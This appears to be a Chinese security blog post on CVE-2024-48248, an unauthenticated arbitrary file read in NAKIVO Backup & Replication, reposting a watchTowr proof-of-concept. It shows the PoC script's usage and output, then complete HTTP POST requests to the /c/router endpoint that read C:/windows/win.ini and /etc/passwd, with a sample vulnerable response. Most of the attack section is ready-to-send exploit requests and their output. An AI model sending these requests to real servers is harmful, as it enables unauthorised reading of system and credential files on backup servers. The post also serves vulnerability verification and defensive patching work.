nakivo-任意文件读取(CVE-2024-48248)

发布于 作者:

nakivo-任意文件读取(CVE-2024-48248)

爱坤 爱坤sec 2025-03-17 23:30

漏洞验证获取地址在文章末尾

受影响的版本:NAKIVO 的 10.11.3.86570 及以下版本

使用方法: 

python3 watchtowr-vs-nakivo-arbitrary-file-read-poc-CVE-2024-48248.py --url https://192.168.1.1:4443 --file "C:\\windows\\win.ini"
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________ 
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|   
                                  \/          \/     \/                            

        watchtowr-vs-nakivo-arbitrary-file-read-poc-CVE-2024-48248.py
        (*) Nakivo Unauthenticated Arbitrary File Read (CVE-2024-48248) POC by watchTowr

          - Sonny , watchTowr ([email protected])

        CVEs: [CVE-2024-48248]

[*] Targeting https://192.168.1.1:4443
[*] Attempting to read file 'C:\windows\win.ini'
[*] File Contents:
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

原分析文章分析出处: 

https://labs.watchtowr.com/the-best-security-is-when-we-all-agree-to-keep-everything-secret-except-the-secrets-nakivo-backup-replication-cve-2024-48248/

手动验证:

发送如下数据包

windows 

POST /c/router HTTP/1.1
Host: {{Hostname}
Content-Type: application/json
Connection: keep-alive
Content-Length: 121
{"action":"STPreLoadManagement","method":"getImageByPath","data":["C:/windows/win.ini"],"type":"rpc","tid":3980,"sid":""}

linux 

POST /c/router HTTP/1.1
Host: {{Hostname}
Content-Type: application/json
Connection: keep-alive
Content-Length: 121
{"action":"STPreLoadManagement","method":"getImageByPath","data":["/etc/passwd"],"type":"rpc","tid":3980,"sid":""}

若响应包为这种,则存在漏洞: 

HTTP/1.1 200 

POST /c/router HTTP/1.1
Host: {{Hostname}
Content-Type: application/json
Connection: keep-alive
Content-Length: 121
{"action":"STPreLoadManagement","method":"getImageByPath","data":["C:/windows/win.ini"],"type":"rpc","tid":3980,"sid":""}
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Strict-Transport-Security: max-age=31536000; includeSubDomains
Cache-Control: max-age=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 466
Keep-Alive: timeout=60
Connection: keep-alive
{"action":"STPreLoadManagement","method":"getImageByPath","tid":"3980","type":"rpc","message":null,"where":null,"cause":null,"data":[59,32,102,111,114,32,49,54,45,98,105,116,32,97,112,112,32,115,117,112,112,111,114,116,13,10,91,102,111,110,116,115,93,13,10,91,101,120,116,101,110,115,105,111,110,115,93,13,10,91,109,99,105,32,101,120,116,101,110,115,105,111,110,115,93,13,10,91,102,105,108,101,115,93,13,10,91,77,97,105,108,93,13,10,77,65,80,73,61,49,13,10]}